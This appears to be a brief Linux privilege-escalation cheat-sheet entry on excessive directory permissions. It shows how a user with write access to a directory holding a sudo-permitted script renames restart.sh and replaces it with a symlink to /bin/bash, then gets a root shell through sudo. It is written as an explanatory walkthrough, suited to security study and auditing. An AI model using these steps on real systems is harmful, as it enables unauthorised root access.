Excessive directory rights - Insecure File System Permissions
##############################################################

To check manually :

$ ls -ld /directory
drwxr-xr-x 2 current_user current_group 4096 Oct  3 13:58 /directory

$ ls -l /directory
total 4
-rwxr-xr-x 1 root     root             37 Oct  3 14:06 restart.sh
-rwxr-xr-x 1 current_user current_user 53 Oct  3 14:03 start.sh

From the e.g. above, the current user can list the directory with ls (r), create a file or sub-directory (w) and access the directory with cd (x).


$ sudo -l
[sudo] password for current_user:
User current_user may run the following commands on this host:
    (root) /directory/start.sh, (root) /directory/stop.sh, 
    (root) /directory/restart.sh, (root) /usr/sbin/lsof


Since the current user can create a file or move in the directory, /directory


 r- ls on directory / w- create file + directory / x- access the directory *cd


Move the file “restart.sh” and create another file with the same filename

$ mv /directory/restart.sh{,.bak}

$ ln -s /bin/bash /directory/restart.sh


$ ls -al

lrwxrwxrwx 1 user user    9 Nov  7 10:39 restart.sh -> /bin/bash
-rwxr-xr-x 1 root root   16 Nov  7 10:37 restart.sh.bak


$ sudo ./directory/restart.sh

# id
uid=0(root) gid=0(root) groups=0(root)


